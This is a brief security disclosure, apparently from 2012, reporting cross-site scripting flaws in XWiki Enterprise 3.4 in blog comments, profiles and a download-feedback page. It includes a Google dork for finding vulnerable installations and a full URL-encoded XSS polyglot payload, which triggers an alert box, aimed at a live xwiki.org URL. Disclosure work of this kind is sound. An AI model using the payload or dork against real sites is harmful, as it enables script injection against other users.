# Date: 4.02.2012
# Author: Sony
# Software Link: http://www.xwiki.org/
# Software Version: XWiki Enterprise 3.4
# Google Dorks: inurl:xwiki/bin/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/xwiki-cross-site-scripting.html
..................................................................
("Wikimania")
Well, we have xss in comments form in blogs.
http://www.xwiki.org/xwiki/bin/view/Blog/XWikiEnterprise14RC1Released
And yes, in the profile..(TWiki,Foswiki..)
http://www.xwiki.org/xwiki/bin/XWiki/SonyStyles
In the old versions we can see cross site scripting in different places.
p.s. Also i found xss in download link, interesting place for xss..
http://www.xwiki.org/xwiki/bin/view/DownloadCode/DownloadFeedback?downloadLink=http://download.forge.objectweb.org/xwiki/xwiki-enterprise-installer-windows-3.4.exe&projectType=Stable&projectVersion=3.4%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&projectID=1
Demo Video: (but with humor, because i like humor..)
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.